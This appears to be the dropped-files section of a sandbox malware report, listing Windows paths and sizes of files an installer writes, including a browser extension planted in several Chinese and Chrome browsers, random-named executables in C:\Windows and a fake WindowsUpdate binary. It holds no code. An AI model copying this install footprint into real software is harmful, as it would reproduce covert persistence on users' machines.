    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\is-MF5A3.tmp (40 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\xmlconfig\is-RP6UK.tmp (663 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\is-19N56.tmp (816 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-460JK.tmp (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-FVIO4.tmp (230 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-2MIAD.tmp (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\DirectUI\is-IADDD.tmp (594 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\is-NICJE.tmp (816 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\is-HVUIH.tmp (2105 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\is-T9LKT.tmp (3073 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\is-3KJB6.tmp (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\is-J5JMM.tmp (18 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\is-CAITJ.tmp (13800 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\is-G6L66.tmp (2321 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\DirectUI\is-2VABS.tmp (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\is-B8MLT.tmp (4185 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\is-065I6.tmp (57 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-A0FE6.tmp (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-9S1N0.tmp (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-J759K.tmp\ISTask.dll (687 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\chromeNativeClient\is-G7L8O.tmp (2105 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-IK8SG.tmp (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\is-7F8IN.tmp (3361 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\is-PBIU3.tmp (2321 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-LF318.tmp (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\is-8PHSQ.tmp (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\DirectUI\is-5ICHK.tmp (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\is-20378.tmp (56 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\is-LUS01.tmp (601 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\is-CTN93.tmp (3361 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\is-RPA16.tmp (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-UL91T.tmp (520 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\RLDataView.d (438 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-T50I1.tmp (18 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-BHK2S.tmp (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-J759K.tmp\_isetup\_shfoldr.dll (47 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-4EB2H.tmp (18 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-7ON68.tmp (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\is-PEBLC.tmp (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\is-0PTE5.tmp (88 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\chromeNativeClient\is-SM9S4.tmp (412 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\is-RVOIL.tmp (294 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-8NQQU.tmp (601 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-SMSJL.tmp (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-ULD5Q.tmp (230 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-L3U6R.tmp (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\is-4Q56G.tmp (294 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-9FV32.tmp (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-7LBB8.tmp (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-SIFLR.tmp (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\is-6SUBS.tmp (18 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-9G0BA.tmp (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-R6SC4.tmp (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\is-9T08E.tmp (40 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-UBRU8.tmp (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\xmlconfig\is-EPA69.tmp (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\is-K9B92.tmp (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-C1SG6.tmp (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\jyueservice.exe (208 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\DirectUI\is-TO7V8.tmp (594 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-AGEEL.tmp (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-A35DN.tmp (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-4SP61.tmp\src2011.tmp (1423 bytes)
    C:\Windows\onest.txt (1 bytes)
    C:\Windows\Report.log (7 bytes)
    C:\Windows\Media\McIe.wav (17 bytes)
    C:\Windows\Media\Mcfg.wav (1 bytes)
    C:\Windows\tAzJsX\27e.exe (108 bytes)
    C:\Windows\tAzJsX\bFuAq.exe (218 bytes)
    C:\Windows\tAzJsX\Dqc.exe (108 bytes)
    C:\Windows\tAzJsX\G57.exe (108 bytes)
    C:\Windows\tAzJsX\BPp.exe (108 bytes)
    C:\Windows\tAzJsX\PTR.exe (108 bytes)
    C:\Windows\Media\hd.wav (1 bytes)
    C:\Windows\mcconfig.dat (2 bytes)
    C:\Windows\pcq.exe (108 bytes)
    C:\Windows\tAzJsX\LiveUDHelper.dll (1 bytes)
    C:\Windows\tAzJsX\drH.exe (108 bytes)
    C:\Windows\tAzJsX\MIJ.exe (108 bytes)
    C:\Windows\tem.vbs (169 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Games\Steam Dark Messiah Might and Magic Single Player™.lnk (280 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B912B2C6928A18B8CD7D50CF08BEA95B_481E03432F6D1AE9D28AB3294512C01D (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\GameExplorer\{98A0A23D-0A5F-4D35-9D4A-DAF2B7F0CF43}\PlayTasks\0\Play.lnk (756 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab6344.tmp (51 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1DAF2884EC4DFA96BA4A58D4DBC9C406 (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar6345.tmp (2712 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B912B2C6928A18B8CD7D50CF08BEA95B_481E03432F6D1AE9D28AB3294512C01D (1848 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1DAF2884EC4DFA96BA4A58D4DBC9C406 (804 bytes)
    C:\Windows\WindowsUpdate\otqvyruekg.exe (47523 bytes)
    %Program Files%\HC188.exe (1522 bytes)
    C:\Windows\st.dat (75 bytes)
    C:\Windows\Media\[i1HKe].mp3 (1 bytes)
    C:\Windows\star.dat (44 bytes)
    C:\Windows\webpid.txt (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\contentscript.js (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.html (230 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\icon.gif (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_remove\res\icon.gif (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\computed_hashes.json (40 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\popup.html (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\messages.json (294 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_create\res\crx.png (196 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_create\background.js (772 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\contentscript.js (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\messages.json (816 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\verified_contents.json (18 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\manifest.json (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (18 bytes)
    %Program Files%\Google\Chrome\Application\54.0.2840.59\resources.pak (597622 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\icon.gif (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_remove\_metadata\verified_contents.json (580 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\messages.json (816 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\messages.json (294 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\icon.gif (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_update\manifest.json (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\cupdate.dat (157 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.html (230 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (18 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\contentscript.js (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences (8273 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_remove\_metadata\computed_hashes.json (1060 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\calmath.js (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\computed_hashes.json (40 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_update\popup.html (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_remove\_locales\en\messages.json (294 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\messages.json (294 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_update\background.html (230 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\messages.json (816 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_create\_metadata\verified_contents.json (580 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_update\background.js (772 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_create\_locales\en\messages.json (294 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\messages.json (294 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.html (230 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\crx.png (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\calmath.js (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\popup.html (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\calmath.js (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_remove\background.html (230 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\calmath.js (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\manifest.json (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\verified_contents.json (18 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\computed_hashes.json (40 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\messages.json (816 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_remove\background.js (772 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\crx.png (88 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\popup.html (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_remove\manifest.json (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\computed_hashes.json (40 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\computed_hashes.json (40 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\messages.json (816 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_remove\popup.html (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (18 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\icon.gif (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\verified_contents.json (18 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\messages.json (294 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_remove\_locales\zh_CN\messages.json (816 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_update\res\icon.gif (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\jyrl\config\rili.ini (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_create\popup.html (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_update\_metadata\verified_contents.json (580 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\popup.html (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.html (230 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_update\_locales\zh_CN\messages.json (816 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_create\_locales\zh_CN\messages.json (816 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_remove\res\crx.png (196 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_create\background.html (230 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\manifest.json (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_create\manifest.json (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\contentscript.js (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.html (230 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\crx.png (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_update\_locales\en\messages.json (294 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fe2c\jyrili.exe (3073 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (18 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\verified_contents.json (18 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (18 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\crx.png (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\contentscript.js (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_create\_metadata\computed_hashes.json (1060 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_create\res\icon.gif (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\verified_contents.json (18 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\manifest.json (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\crx.png (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\popup.html (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\7zxr.dll (18123 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\icon.gif (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_update\res\crx.png (88 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\calmath.js (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\manifest.json (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_update\_metadata\computed_hashes.json (1060 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_update\_locales\zh_CN\messages.json (816 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_remove\_locales\en\messages.json (294 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_create\_locales\en\messages.json (294 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_create\res\icon.gif (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_update\_metadata\verified_contents.json (580 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_create\background.html (230 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_update\_metadata\computed_hashes.json (1060 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\cupdate.dat (157 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_remove\_metadata\verified_contents.json (580 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_create\background.js (772 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_remove\_locales\zh_CN\messages.json (816 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_update\background.js (772 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_update\res\icon.gif (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_remove\res\icon.gif (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_update\popup.html (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_create\manifest.json (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_create\_metadata\verified_contents.json (580 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\7zxr.dll (18123 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_remove\background.js (772 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_create\popup.html (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_update\res\crx.png (88 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_create\res\crx.png (196 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_remove\res\crx.png (196 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_update\_locales\en\messages.json (294 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_remove\_metadata\computed_hashes.json (1060 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_update\manifest.json (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_remove\manifest.json (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_create\_locales\zh_CN\messages.json (816 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_remove\popup.html (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_create\_metadata\computed_hashes.json (1060 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_remove\background.html (230 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_update\background.html (230 bytes)

